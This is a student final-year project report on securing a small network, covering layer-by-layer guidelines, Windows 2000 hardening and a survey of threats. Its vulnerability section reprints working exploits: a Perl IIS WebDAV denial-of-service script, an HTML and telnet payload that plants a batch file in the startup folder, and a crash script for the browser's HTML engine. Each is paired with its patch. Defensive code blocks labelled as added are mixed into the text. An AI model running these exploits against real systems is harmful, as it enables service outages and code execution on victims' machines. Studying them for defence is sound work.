Faculty of Engineering and Architecture
Department of Electrical and Computer Engineering


Final Year Project report for the 05/06 academic year


Project name:
DFNZ 06
Network Security




Project advisor:
Dr. Ali Hajj

Team members:
Antoine George Akiki
Joseph Melhem Chaoul
Jean Kamal Moukarzel


Table of Contents
List of Figures and Tables ..... 4
Abstract ..... 6
Introduction ..... 8
1. A Brief Overview of Networks ..... 10
1.1 Network Symbols ..... 10
1.2 Network Components ..... 11
1.3 Network Structure ..... 13
1.4 OSI Model Overview ..... 14
1.5 Network Devices ..... 16
1.5.1 Hubs ..... 16
1.5.2 Switches/bridges ..... 17
1.5.3 Routers and layer 3 switches ..... 18
2. Network Security Theory ..... 19
2.1 Physical Layer Security ..... 19
2.2 Hardware Layer Security ..... 20
2.3 Application Layer Security ..... 21
2.4 Operating System Layer Security ..... 24
2.4.1 Windows 2000 Vulnerabilities and Solutions ..... 25
2.4.2 Increasing Windows 2000 and XP Security (refer to [7]) ..... 29
2.5 Network Layer Security ..... 34
2.5.1 TCP/IP – The Language of the Internet (refer to [12]) ..... 35
2.5.2 Attacks against IP (refer to [12]) ..... 35
2.5.3 IPSEC Policy Architecture (refer to [13]) ..... 38
2.6 Internal Network Security ..... 39
2.7 Survey of Most Common Threats ..... 41
2.7.1 Attacks Automated by Malicious Codes ..... 41
2.7.2 Hackers Attacks (not automated by malicious codes) ..... 48
2.7.3 DoS ..... 51
2.7.4 Social Engineering ..... 59
3. Our Network Design ..... 63
3.1 Topology ..... 63
3.2 Securing the Perimeter ..... 64
3.3 Our Network ..... 68
4. Installing the Network ..... 69
4.1 Plugging the Network and Creating a Domain ..... 70
4.1.1 Setting Up the Linksys Product ..... 70
4.1.2 Creating the Domain ..... 71
4.2 Tightening Security ..... 72
4.2.1 Patches on Windows ..... 72
4.2.2 Disabling USB Ports to Protect Against Flash Drives ..... 72
4.3 Creating Common and User Files ..... 75
4.4 Scanning the Network and Updating Security ..... 75
4.4.1 Linux Tools ..... 76
4.4.2 Windows Tools ..... 76
4.5 Confusing the Hackers: Honey Pots ..... 77
4.5.1 What is a Honeypot ..... 77
4.5.2 Classifications of Honeypots ..... 78
4.5.3 Review of Most Popular Honeypots ..... 82
4.5.4 Our Selection and Work ..... 91
4.6 User Logs ..... 96
5. Countering the Attacks ..... 106
5.1 First Attack ..... 106
5.2 Second Attack: Physical Attack ..... 116
Conclusion ..... 118
Reference ..... 120
Appendix ..... 122
Appendix A ..... 122
Appendix B: PortSentry ..... 122
Appendix C: Timeline and Budget ..... 129

List of Figures and Tables
Figure 1.1: Networking facilitates the access of information (p11)
Figure 1.2: Hierarchical Structure of a Network (p12)
Figure 1.3: OSI layers (p14)
Figure 1.4: Workstations connected with a hub (p16)
Figure 1.5: devices connected with a switch (p16)
Figure 1.6: Typical connections of a router (p17)
Figure 2.1: A Wider View of Internet-connected Networks (p36)
Figure 3.1: Our Network Design (p41)
Figure 2.1: Classification of malicious code (p43)
Figure 2.3: Main types of viruses (p44)
Figure 2.4 Program File Virus (p46)
Figure 2.5: Logic Bomb (p51)
Figure 2.6: DoS (p52)
Figure 2.7: DDoS Attack (p53)
Figure 2.8: DRDoS (p54)
Figure 2.9 DRDoS Reflection (p55)
Figure 2.10: TCP 3 way handshake (p57)
Figure 2.11: Smurf Attack (p57)
Figure 3.1: Network Topologies (p62)
Figure 3.2: Our Network Design (p67)
Figure 4.1: Back Officer Friendly Detective (p79)
Figure 4.2: BOF screen capture showing spoofed services (p82)

Figure 4.3: BOF warnings (p82)
Figure 4.4: Specter GUI (p85)
Figure 4.5: A possible deployment of Decoy Server (p87)
Figure 4.6: Honeynet Architecture (p89)
Figure 4.7: Server application output format (p101)
Table 1.1: Network Symbol (p10)

Abstract
Network security is a rising issue in all major businesses due to the increase in sophistication and abundance of security breaches over the past decade. This is why Deloitte & Touche, a major international auditing firm, proposed to AUB that a group of graduating computer engineers work on network security as the topic for their Final Year Project. To this end, preliminary meetings were arranged by Prof. Kayssi (ECE Department Chairperson) and held with Mr. Saad Majari, an AUB graduate now working for Deloitte's IT department, so that we could be introduced to the company and its interests concerning network security.
During these meetings, we agreed that two groups of three students each would work on the topic. The two groups' supervisor would be Prof. Ali el-Hajj, from the ECE department. It was also decided that our group would handle setting up a network and ensuring it is secured in all ways possible. The other group of three would therefore have the task of hacking into our network, from the outside but also from the inside, in order to pinpoint our network's weaknesses. The output of this project would be proper documentation relating all the steps taken to secure the network and to deal with the attacks.
During the first stage of our Final Year Project, we performed an in-depth literature survey in order to get more acquainted with the subject. Reading material was provided to us by Mr. Awad, Mr. Majari and Mr. Brouwer, from Deloitte, in addition to white papers and documents we found on the internet.

The material found relevant to our project is included in this report. Covered topics range from network specification and topology, an overview of past and current security breaches, and security strategies for the different network layers, to possible attacks.
With this in-depth information, we were able to set up our network in the second stage of our FYP and secure it by implementing the security strategies. We were given four computers equipped with Pentium 2 processors. We thus installed one Windows 2000 server, one Windows 2000 workstation, one Fedora server and one Fedora workstation.
Finally, the third and final stage of our FYP was the "attacks" stage. The hackers' team attempted to attack our network externally and internally. Full documentation of these attacks is included in this report.

Introduction
Our Final Year Project (FYP), entitled 'Dfnz06', is a project involving network security and attacks. Throughout the academic year, two teams will challenge each other, one being the security team (our team) and the other the hacking team. The project was proposed and will be supervised by Deloitte, in cooperation with Prof. Ali Hajj from the ECE department.

Security of networks and information systems in general is essential to businesses that need to connect to the internet and keep their data safe. It is also essential within the business, where employees are given specific roles and privileges that define which part of the information they can read and/or write.
In this sense, it is important for a business to build a well-secured network. In doing so, many factors are to be taken into consideration, as we are tackling a multi-disciplinary field which nonetheless must be treated as a whole [1].
The task assigned to us was to build a small network, just as small and medium-sized businesses (SMBs) would do, and to document all the guidelines and steps that were followed to secure this network. In this way, the resulting document could be used as a reference for students and faculty, but also for professionals wanting to learn about the measures that should be taken in order to have a protected network.
However, it does not stop here. It is common practice amongst engineers to test every design they make. In the case of our FYP, the testing will be a real-life situation. Another group of students will try to hack into our network, from the outside (by connecting to our firewall) and from the inside (they will be given an account with limited privileges and will try to bypass it). In this way, not only the steps in designing the network will be documented, but also the measures to be taken when a breach of security is identified.

This report gives an account of what has been done in our FYP during the whole 2005/2006 academic year.
It starts by giving a brief overview of networks, as it is essential to fully understand the way a network operates in order to secure it. It then presents what can be regarded as a literature survey: a summary of all the information relevant to network security design that we will be using while building the network. As stated earlier, many factors should be taken into consideration, such as the physical layer, the hardware layer, the application layer, the operating system layer and the network layer. It is also important to know the enemy when trying to defend a network: therefore, a survey of the most common threats and how they should be dealt with is presented in this report. Moreover, this report presents our design: the network we built and its specifications (documenting the steps taken while building). Finally, the last part of this report is a detailed documentation of the attacks performed by the hackers' team and the ways by which we dealt with such attacks.


1. A Brief Overview of Networks
This section presents a review of internetworking terminology, such as the Open System
Interconnection (OSI) reference model and how the layers in the OSI operate. Moreover,
this section gives a brief overview of the devices that are used to support different
network requirements.
1.1 Network Symbols
The following symbols will be used throughout this report to illustrate various network devices. All graphics are courtesy of Cisco Systems.

Table 1.1: Network Symbols (Cisco icons, not reproduced here, for: Router, Firewall, Switch, Workstation, Bridge, Server, Hub)


1.2 Network Components
The primary purpose of Networks is to enable easy access of information regardless of
place, time, and type of computer system [2].


Figure 1.1: Networking facilitates the access of information [2]

As can be seen in the figure above, the big company network is subdivided into the following network components:
• The Main Office: everyone in this office is connected via a LAN (Local Area Network). The company's servers (and hence vital information) are located on and connected via this same LAN.
• A Branch Office: information from the main office's server can be accessed remotely (via a multitude of ways: leased line, Virtual Private Network, Internet…). In this way, although physically far, the branch office seems part of the main office's network.
• A Home Office: employees can work from their homes, most likely with on-demand connections to the main office (or even the branch office). In this way, an employee working from home can access information from the company's servers and use the network's resources.
• Mobile Users: these are individuals who connect to the main office's LAN wherever they are (by a multitude of means, most likely an on-demand connection using phone lines).
The fact that the main office's LAN is connected to the internet and to other network components (like the branch office) makes it important to have a secure design. In this way, vital information will not fall into the wrong hands and the company's privacy will be preserved.
1.3 Network Structure
In general, and in almost every enterprise, networks are structured in a hierarchical way:

Figure 1.2: Hierarchical Structure of a Network (access layer, distribution layer, core layer)


The access layer of the network, also referred to as the desktop layer, is the point at which end users are connected to the LAN. In other words, the access layer is any end-station's entry point to the network. Sometimes, end users are placed in groups according to which resources they need to access the most. Most of the time, when a user needs to use the printer, access a server or use the internet, his traffic is directed to the distribution layer.

The distribution layer, also referred to as the workgroup layer, is the link between the
access layer (hence the users) and the “motorway” [2] of the network, i.e. the core. The
main function of the distribution layer is to perform vital packet manipulation such as:
• Routing,
• Filtering,
• WAN access…
In brief, the distribution layer can be regarded as the policy controller: it determines if and how packets can access the core. It also determines the fastest way for a user to access the servers. In any case, once the layer in question decides on the path, it forwards the request to the core layer.

The main purpose of the core layer, also referred to as the backbone, is to switch traffic
as fast as possible. It also provides quick transport to what is called enterprise services: e-
mail, videoconferencing and most importantly Internet.
1.4 OSI Model Overview
The OSI model is the conceptual framework of how networks are built and operate. As
the figure below illustrates, the OSI model has seven layers:


Figure 1.3: OSI layers [2]


The four lower layers define ways for end stations to connect to each other in order to exchange data. The three upper layers define the way applications (within the end stations) communicate with each other and with the users. In more detail, the roles of each layer are:
• Application layer: layer at which user interacts with the computer. Protocols at
this layer determine available resources, define communication partners and
synchronize all communication.
• Presentation layer: ensures that information sent by application layer of one end
station will be readable by the application layer of another end station operating
on another system. This is done by encryption for example.
• Session layer: establishes, manages and terminates communication sessions
between presentation layers.

• Transport layer: this layer distinguishes between upper-layer applications and establishes end-to-end connectivity between them. It also defines flow control and provides reliable or unreliable services for data transfers.
• Network layer: this layer defines the logical source and destination addresses associated with a specific protocol. It also defines the different paths that exist through the network and interconnects multiple data links. Note that routers and layer 3 switches operate at this layer.
• Data-Link layer: this layer defines the physical source and destination addresses and the network topology. It also supports frame sequencing and flow control. Note that switches operate at this layer.
• Physical layer: this layer is the most basic of all; it defines the media type, connector type and signaling type. In other words, this layer specifies the electrical, mechanical, procedural and functional requirements for activating, deactivating and maintaining the physical link between end systems. Note that hubs and bridges operate at this layer.

1.5 Network Devices
1.5.1 Hubs
Hubs operate at the physical layer. This implies that all devices are in the same broadcast domain and the same collision domain. The devices also share bandwidth. In other words, devices connected to a hub communicate with each other as if they were on the same segment. The hub connecting them does not manipulate or inspect the traffic exchanged.



Figure 1.4: Workstations connected with a hub


1.5.2 Switches/bridges
Layer 2 switches (i.e. switches) or bridges operate at the data-link layer. Each segment
connected to a port in the switch has its own collision domain, but all segments are in the
same broadcast domain.
The switch hears every frame that crosses a segment and determines whether it has to
copy it to another segment by looking at the destination address and checking in its MAC
table.

Figure 1.5: devices connected with a switch
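The learning and forwarding behaviour described above, as an added simulation (not code from the report): the switch records the ingress port of every source MAC, forwards a frame only to the port that holds its destination, and floods unknown-unicast and broadcast frames to every other port. All MAC addresses and port numbers are constructed sample values.

```python
"""Simplified layer 2 learning switch (illustration added here, not from the report)."""
from dataclasses import dataclass, field

BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass
class Frame:
    src: str            # source MAC (constructed sample values in demo())
    dst: str            # destination MAC
    payload: str = ""


@dataclass
class LearningSwitch:
    port_count: int
    mac_table: dict = field(default_factory=dict)  # MAC address -> port number

    def receive(self, in_port: int, frame: Frame) -> list[int]:
        """Process a frame arriving on in_port and return the ports it is copied to."""
        if not 0 <= in_port < self.port_count:
            raise ValueError(f"no such port {in_port}")
        # Learn: the source address is reachable through the ingress port.
        self.mac_table[frame.src] = in_port
        # Every port shares one broadcast domain, so broadcasts go everywhere but the ingress port.
        if frame.dst == BROADCAST:
            return [p for p in range(self.port_count) if p != in_port]
        out_port = self.mac_table.get(frame.dst)
        if out_port is None:
            # Unknown unicast destination: flood until the destination answers and is learned.
            return [p for p in range(self.port_count) if p != in_port]
        if out_port == in_port:
            # Sender and receiver share a segment (collision domain); nothing to copy.
            return []
        return [out_port]


def demo() -> tuple[list[int], list[int], list[int]]:
    """Three frames between two constructed hosts on a four-port switch."""
    sw = LearningSwitch(port_count=4)
    host_a, host_b = "00:00:5e:00:53:0a", "00:00:5e:00:53:0b"
    first = sw.receive(0, Frame(src=host_a, dst=host_b))   # b unknown: flooded to 1, 2, 3
    reply = sw.receive(2, Frame(src=host_b, dst=host_a))   # a learned on port 0: [0]
    second = sw.receive(0, Frame(src=host_a, dst=host_b))  # b now learned on port 2: [2]
    return first, reply, second


if __name__ == "__main__":
    print(demo())
```

The first frame is flooded exactly as a hub would deliver it; only after the reply is the conversation confined to two ports.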



1.5.3 Routers and layer 3 switches
Routers and layer 3 switches operate at the network layer. They can control broadcasts and multicasts, they determine the optimal path a frame should take, and they manage traffic. Usually, routers are the network's doorway to the internet or to a bigger WAN.


Internet
Other LAN
Figure 1.6: Typical connections of a router


2. Network Security Theory
Now that we have a brief but precise and clear understanding of how a network operates, it is time to tackle the security aspect. How is a network secured from the outside and from within? What are the different fields that come into play? All those questions were answered by our research. Although we came across a lot of readings, we hereby present the information we judged to be the most essential and relevant to our project.

Security is multi-dimensional: it spans different layers. Throughout this section we will discuss the security of the physical, hardware, application, operating system and network layers. Moreover, this section will give the principal rules and guidelines to secure a network from the inside.
2.1 Physical Layer Security
Physical security is often viewed as the first line of defense of a system [1]. It forbids the
intruder to access the system physically (to sit and access information on an already
logged in computer).
Applying physical layer security to our FYP gives us the following guidelines:
• A person of our team should always be present whenever a computer is logged in.
Logged in computers should never be left unattended.
• If possible, access to the room where our network is located (Khaled JouJou's lab) should be controlled and denied to those who have no business there. Moreover, the switch and firewall should not be accessible to members outside the team. If this is not possible, users should be restricted to logging in only on certain systems, whether they are identified by MAC addresses (see further sections) or by hostname. Security can also be enhanced by allowing them access only during certain times, for example.
• The team should adopt a clear desk policy: vital documents should be stored on
CDs or USB keys, and should not be kept unattended (lock in drawers, take away
home…).
• A proper inventory of all the equipment we have should be done, and no device or
machine should be unplugged and taken away without a reason.
• Our network should be protected against power failures and climate hazards (this
should not be a problem in Mr. Joujou’s labs).
On a larger enterprise scale, other measures can be taken to increase the physical security of the system: biometrics can be used for identification purposes, visitors should not be left unattended, and server rooms should be equipped with appropriate monitoring devices (cameras for example), guarded by appropriately trained personnel, or secured with key-card access doors.
2.2 Hardware Layer Security
There are two aspects of hardware security, the first one consists of security at the
hardware level in CPUs, and the second one consists of hardware security at the level of
the enterprise and the users [1]. An example of a security issue at the CPU level is the
interrupt handling. The interrupt vector table is a target for hackers that are able to exploit
the system vulnerabilities at the lower level.
As for hardware security at the level of the enterprise, the following guideline should be
implemented in our FYP:

• Access to a server's or a workstation's BIOS should be protected by a password (which only the administrator knows). In this way, a user will not be able to take control of the machine or access data that he would otherwise not be able to retrieve (given his privileges).
• The BIOS should be configured to limit the boot sequence to the OS drive. A user should not be able to boot from other drives such as floppies or CDs. Also, by forcing the workstation to boot only from the OS drive, installation of software or new operating systems will be denied.
• Configurations of routers and/or switches should be password protected.
On a larger enterprise scale, it is also important to protect the access to printers by a
password. Otherwise, a hacker can change a printer’s configuration and reroute printer
outputs to other destinations (theft of information).
2.3 Application Layer Security
Application layer security is very important since it involves entrance of data [1]. The
application layer consists of software and database development mainly. The threats at
this layer are: buffer overflows, backdoors, incompleteness of data and viruses. There are
specific guidelines we will be following to achieve security at this layer.
• Users should be limited to having only one active session with the applications
and the network. In this way, accountability of users is enhanced.
• Users should have identifiable usernames that follow the same pattern for all (ex:
the AUB usernames are composed of the users’ initials). Logs should be entered
in a database and queries can be used to retrieve specific information.

• A list of unauthorized software should be established, to prevent users from installing any undesired, dangerous software (it is recommended to ban users from installing any software).
• Highly sensitive data should be encrypted before being stored. In this way, reading or writing such data is more difficult.
• Any software upgrade should be installed in time. However, it is recommended to test these upgrades and look for any patches that could enhance security.
• Initial passwords should be given to users after being generated in a random way.
• Some password conditions should be set: passwords should not be the same as the username or the user's department, for example. They should be at least 6 (or 8 in sensitive cases) characters long, and include combinations of letters and numbers. In this way, guessing passwords is almost impossible and cracking them is a lengthy process for hackers.
• If a user tries to access his account without success (the password entered is incorrect), his account should be blocked after 3 trials. Only the administrator should have the power to unblock the account.
• When the administrator changes the privileges of a user (after a promotion or a demotion, for example), the user should automatically be logged off and asked to log in again. Moreover, if a user account is deleted, the user should also be logged off (to prevent this user from doing unnecessary and dangerous operations when, in fact, he is not allowed to). In this way, user accountability and responsibility are enforced.

• The user profile should be complete and informative. In a company for example,
it should include the department of the user, his ranking, etc. To force the user to
fill in vital information in his profile, some fields should be made obligatory. In
this way, if ever the user’s information is needed, it will be complete and clear
and accountability is thus enforced.
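The password and lockout rules in the list above, as an added worked example (not code from the report or from the network we built): a password is rejected when it matches the username or department, is shorter than 6 characters (8 for sensitive accounts) or lacks a letter/digit mix; three consecutive failed logins lock the account, and only an administrator can clear the lock. Usernames, departments and passwords below are constructed sample values, and PBKDF2 storage is an assumption of this example.

```python
"""Account password policy and lockout (illustration added here, not from the report)."""
import hashlib
import hmac
import os
from dataclasses import dataclass, field

MAX_FAILED_ATTEMPTS = 3  # the report's rule: block the account after 3 failed trials


def password_policy_errors(password: str, username: str, department: str,
                           sensitive: bool = False) -> list[str]:
    """Return the policy rules a candidate password violates (empty list = acceptable)."""
    errors = []
    minimum = 8 if sensitive else 6
    if len(password) < minimum:
        errors.append(f"shorter than {minimum} characters")
    if password.lower() == username.lower():
        errors.append("same as username")
    if password.lower() == department.lower():
        errors.append("same as department")
    has_letter = any(c.isalpha() for c in password)
    has_digit = any(c.isdigit() for c in password)
    if not (has_letter and has_digit):
        errors.append("must mix letters and digits")
    return errors


def _digest(password: str, salt: bytes) -> bytes:
    # Store a salted PBKDF2 hash rather than the password itself (assumed scheme).
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


@dataclass
class Account:
    username: str
    department: str
    sensitive: bool = False
    salt: bytes = field(default_factory=lambda: os.urandom(16))
    digest: bytes = b""
    failed_attempts: int = 0
    locked: bool = False

    def set_password(self, password: str) -> None:
        """Accept the password only if it satisfies every policy rule."""
        problems = password_policy_errors(password, self.username, self.department, self.sensitive)
        if problems:
            raise ValueError("; ".join(problems))
        self.digest = _digest(password, self.salt)

    def login(self, password: str) -> bool:
        """Verify the password; a locked account always fails, even with the right password."""
        if self.locked:
            return False
        if hmac.compare_digest(_digest(password, self.salt), self.digest):
            self.failed_attempts = 0      # a success resets the consecutive-failure counter
            return True
        self.failed_attempts += 1
        if self.failed_attempts >= MAX_FAILED_ATTEMPTS:
            self.locked = True
        return False

    def admin_unlock(self, actor_is_admin: bool) -> bool:
        """Only an administrator may clear the lock and the failure counter."""
        if not actor_is_admin:
            return False
        self.locked = False
        self.failed_attempts = 0
        return True
```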

The biggest threat resulting from many applications is their vulnerability to "buffer
overflow" attacks which usually results in the hacker having access to the system with the
rights of whatever user account the application was running under.

The following are some general guidelines related to applications:

• More secure equivalents for insecure applications should be used (ex: ssh instead of telnet, since telnet is inherently insecure due to the fact that passwords are transmitted over the wire as clear text).
• Applications should be kept up-to-date with the latest versions. Many releases are specifically developed to address security issues.
• Ports that an application opens up should be determined and closed if they are not absolutely necessary.
• The application vendor's Web site should regularly be checked for information on how to make the application more secure and for any news items or patches that address newly-discovered security vulnerabilities.
• In the case of a Web server, proper programming techniques can ensure that CGI scripts are secure.
• Also in the case of a Web server, if Web page updates are fairly infrequent, a floppy disk may be used to "sneaker-net" the updated HTML files by logging into the console as root, mounting the floppy disk, copying the files into the DocumentRoot directory, and then unmounting the floppy. Doing so would eliminate the need to run an ftp server service and to enable an account for the person who maintains the pages.
2.4 Operating System Layer Security
As will be seen in the next section of this report, the computers we were provided with have Pentium 2 processors. We therefore decided to install Windows 2000 on them, since Windows XP would be too slow, as well as Fedora. This section aims to present the vulnerabilities and protection schemes for the Windows 2000 operating system and Linux.
Hardening the operating system involves many things that are not only operating-system-specific, but may often vary from one "flavor" of an operating system to another. Typical steps, whatever the OS, include:

Disabling all default accounts and groups that are not needed. When an
operating system is installed it sets up quite a few user accounts and
groups by default (like the guest account, or other application accounts).

24

The startup configuration can be changed so that only necessary services
are running. Many services open TCP/IP "ports" which hackers find when
running port scans against systems. Thus, closing all unnecessary ports by
disabling unnecessary services or application is a common practice.

Server consoles that are not being used should be logged off. This is of
particular importance for Internet-connected systems.
2.4.1 Windows 2000 Vulnerabilities and Solutions
• Microsoft IIS 5.0 WebDAV 'Search' Denial of Service is a vulnerability that was published on March 16, 2001. WebDAV contains a flaw in the handling of unusually long requests: submitting a valid yet unusually long WebDAV 'search' request could restart the IIS services and possibly cause the server to stop responding. The following exploit has been provided by Georgi Guninski [4]:

#!/usr/bin/perl
use IO::Socket;
print "IIS 5.0 SEARCH\n wait some time\n";
if(@ARGV < 2) { die "\nUsage: IIS5 host port \n"; }
$port = $ARGV[1];
$host = $ARGV[0];
sub vv
{
$ll=$_[0]; # length of buffer
$ch=$_[1];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") ||
return;
$over=$ch x $ll; # string to overflow
$xml='<?xml version="1.0"?><D:searchrequest xmlns:D="DAV:"><D:sql>SELECT DAV:displayname from SCOPE("'.$over.'")</D:sql></D:searchrequest>'."\n";
$l=length($xml);
$req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,3000);
print "r=".$res;
close $socket;
}
vv(126000,"V");
sleep(1);
vv(126000,"V");
# Try 125000 - 128000

Solution:
Microsoft patch Q291845_W2K_SP2_x86_en
http://download.microsoft.com/download/win2000platform/Patch/q291845/NT5/EN-US/Q291845_W2K_SP2_x86_en.EXE
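Besides applying the patch, a front-end check can refuse the request shape that triggers this flaw before it reaches IIS. The following guard is an added illustration (not code from the report or from Microsoft): it parses the head of a raw HTTP request, rejects methods outside an assumed allow-list, and refuses WebDAV SEARCH requests whose declared body size exceeds a limit far above what a legitimate search needs. The size limit, the method list and the two sample requests are constructed values.

```python
"""Request-size guard for WebDAV SEARCH (illustration added here, not from the report)."""

# Assumed allow-list for a WebDAV-enabled web server; adjust to the services actually offered.
ALLOWED_METHODS = {"GET", "HEAD", "POST", "OPTIONS", "PROPFIND", "SEARCH"}
# Assumed ceiling: a genuine SEARCH body is a few hundred bytes, the exploit sends over 125 KB.
MAX_SEARCH_BODY = 16 * 1024


def parse_request_head(raw: bytes) -> dict:
    """Split the request line and headers of a raw HTTP request; the body is ignored."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    if head == raw:
        # Tolerate bare-LF requests such as the exploit script above sends.
        head, _, _ = raw.partition(b"\n\n")
    lines = head.decode("latin-1").splitlines()
    if not lines or len(lines[0].split()) != 3:
        raise ValueError("malformed request line")
    method, target, version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            raise ValueError(f"malformed header: {line!r}")
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()   # header names are case-insensitive
    return {"method": method.upper(), "target": target, "version": version, "headers": headers}


def check_request(raw: bytes) -> tuple[bool, str]:
    """Return (allowed, reason) for a raw request head."""
    try:
        req = parse_request_head(raw)
    except ValueError as exc:
        return False, f"malformed: {exc}"
    if req["method"] not in ALLOWED_METHODS:
        return False, f"method {req['method']} not allowed"
    length = req["headers"].get("content-length", "0")
    if not length.isdigit():
        return False, "invalid Content-Length"
    if req["method"] == "SEARCH" and int(length) > MAX_SEARCH_BODY:
        return False, f"SEARCH body of {length} bytes exceeds {MAX_SEARCH_BODY}"
    return True, "ok"


# Constructed sample requests: a normal SEARCH and one shaped like the exploit's.
NORMAL_SEARCH = (b"SEARCH / HTTP/1.1\r\nHost: webserver\r\nContent-Type: text/xml\r\n"
                 b"Content-Length: 214\r\n\r\n")
OVERSIZED_SEARCH = (b"SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: webserver\n"
                    b"Content-length: 126212\n\n")

if __name__ == "__main__":
    for sample in (NORMAL_SEARCH, OVERSIZED_SEARCH):
        print(check_request(sample))
```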
• Microsoft IE 5.01/5.5 Telnet Client File Overwrite is a vulnerability that was
published on March 09, 2001. Services for Unix 2.0 contains a client side logging
option which records all information exchanged in a telnet session. A
vulnerability exists that could enable a remote user to invoke the telnet client and
execute arbitrary commands on a target machine via IE. This is achieved by
crafting a URL composed of command line parameters to the telnet client, which
would invoke 'telnet.exe'. Telnet would connect to the host and initiate the
logging of session information, access to this file will allow an attacker to write
and execute arbitrary commands which may be executed later.

The following exploit has been provided by Oliver Friedrichs [4]:

telnet:-f%20\file.txt%20host
The following is an example of a malicious HTML message which could cause data that is received
from the destination port on the host "host" to be written to the file "filename" in the startup directory
for all users. If the logged in user has the appropriate permissions, a batch file will be created and
executed upon future authentication.
<html>
<frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet:-f%20\Documents%20and%20Settings\All%20Users\start%20menu\programs\startup\start.bat%20host%208000>
</frameset>
</html>

Solution:
Microsoft has released a patch which rectifies this issue:
http://www.microsoft.com/windows/ie/download/critical/q286043/default.asp

• Microsoft Outlook vCard Buffer Overflow is a vulnerability that was published on
February 22, 2001. Due to an unchecked buffer in Microsoft Outlook, it is
possible for a remote user to execute arbitrary code on a victim's machine. If a
maliciously crafted .vcf file containing malformed data in the 'Birthday' field is
sent as an attachment and executed, the maliciously embedded code could be run
on the recipient's machine. An exploit has been provided by Ollie Whitehouse [5].
A solution is provided by a Windows patch:
http://www.microsoft.com/windows/ie/download/critical/q283908/default.asp

• Windows 2000 EFS Temporary File Retrieval Vulnerability was published on
January 19, 2001. EFS is the encrypted file system package designed to secure
sensitive information. It is included with the Windows 2000 Operating System,
distributed and maintained by Microsoft Corporation. A problem in the package
could allow the recovery of sensitive data encrypted by the EFS. When a file is
selected for encryption, a backup copy of the file is moved into the temporary
directory using the file name efs0.tmp. The data from this file is taken and
encrypted using EFS, with the backup file being deleted after the encryption
process is performed. However, after the file is encrypted and the backup is deleted,
the blocks in the file system are never cleared, thus making it possible for any
user on the local host to access the data of the encrypted file, which falls outside
of the constraints of access control imposed by the Operating System. This makes
it possible for a malicious user to recover sensitive data encrypted by EFS.
• Microsoft WINS Domain Controller Spoofing Vulnerability was published on
January 17, 2001. Windows Internet Naming Service (WINS) ships with
Microsoft Windows NT Server. WINS resolves network computer names to IP
addresses in a client/server environment. A distributed database is
updated with an IP address for every machine available on the network.
Unfortunately WINS does not properly verify the registration of domain
controllers. It is possible for a user to modify the entries for a domain controller,
causing the WINS service to redirect requests for the DC to another system. This
can lead to a loss of network functionality for the domain. The DC impersonator
can also be set up to capture username and password hashes passed to it during
login attempts. An exploit has been provided by David Byrne [6], and a
workaround by Paul Schmehl [4].
• Microsoft MSHTML.DLL Crash Vulnerability was published on January 15,
2001. MSHTML.DLL is the shared library for parsing HTML in Internet Explorer
and related applications. It may be possible for an attacker to crash this library
remotely and cause a denial of service with special JScript code. This bug involves
JScript's ability to handle multiple window objects. If a window object is deleted
after it receives data and then re-initialized, the library will reportedly crash. This
behavior has been attributed to a stack overflow by its discoverer. It is reportedly
not exploitable in any way that may permit an attacker to gain access to the victim
host. The following exploit has been provided by Thor Larholm:
<iframe id=test style="display:none"></iframe>
<script>
Larholm = {}; // Object literal
test.document.open(); // Stream data
test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>");
delete Larholm;
Larholm = {}; // Crash
</script>
2.4.2 Increasing Windows 2000 and XP security (refer to [7])
• Editing the registry and disabling services can lead to problems. We must back up
before we change any setting and change only one setting at a time.
- Registry settings are edited with a program called regedt32: click on the Start Menu >
Run > type regedt32.
- Services are turned on and off with services.msc: click on the Start Menu > Run > type
services.msc.
• Null sessions allow unwanted users to gain access to our computers; they are
opened on NetBIOS ports 139 and 445. NetBIOS is Windows' default protocol for "File and
Print Sharing." With automated tools, hackers can gain access to crucial system
information such as accounts and passwords. NULL sessions are a built-in
communication share using an anonymous user and a NULL password on the NetBIOS
port. The easiest way to stop NULL sessions is by disabling "File and Print Sharing" on
all network devices. In order to do so on Windows 2000 go to Control Panel > Network
and Dial-up Connections and select the proper connection.

If these services are required then we will:
- Make a registry entry that prevents sensitive data from being sent through the NetBIOS
port.
- Open regedt32 from the Run Menu.
- Select HKEY_LOCAL_MACHINE > System > CurrentControlSet > Control >
LSA.
- The key we want to edit is RestrictAnonymous.
- We will change the value to 1 or 2. A setting of 1 indicates that null
connections are allowed but sensitive data is blocked from being sent via the
connection (the only option available in NT4). A setting of 2 will disallow any NULL
connections; this may conflict with some 3rd-party software. There are a few
hacking tools that will work on a level 1 setting and retrieve information. Reboot
the machine when done.

Another way to prevent access to port 139 is to disable NetBIOS over TCP/IP.
Windows will then fall back to port 445 to respond to NULL sessions and other
requests.


• Disable SNMP services
If null sessions are disabled, another easy way to gain system information is through
public SNMP.

SNMP permits the monitoring and managing of a network from a single
workstation or several workstations, called SNMP managers. It's a family of
specifications that provide a means for collecting network management data from the
devices residing in a network. With an SNMP manager, you can query the network's
devices regarding the nature of their functions.
If there are no programs using SNMP, we can disable this service. This is the easiest way
to protect against hacks and free up some memory.

If SNMP access is needed, then we set SNMP not to run in public mode:
- Open the registry editor.
- Go to HKLM > System > CurrentControlSet > Services > SNMP > Parameters >
ValidCommunities.
- Select Security > Permissions and change them to permit access only to approved users.

There is one more step to disabling public access to SNMP.

- Go to HKLM > System > CurrentControlSet > Services > SNMP > Parameters >
ExtensionAgents and delete the value that contains the
LANManagerMIB2Agent. Then rename the other entries to update the
sequence, i.e. 2, 3 etc., until the sequence begins with 1.
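As an added example (not from the report or from reference [7]), this Python script audits the NULL-session and SNMP settings the steps above change. The registry paths are the ones named in the text; the audit logic takes a snapshot of the values, the optional live reader uses Python's standard winreg module and only works on Windows, and the sample snapshot is constructed.

```python
"""Audit of the NULL-session and SNMP registry settings discussed above.

The checking logic is pure Python (it takes a snapshot of the values);
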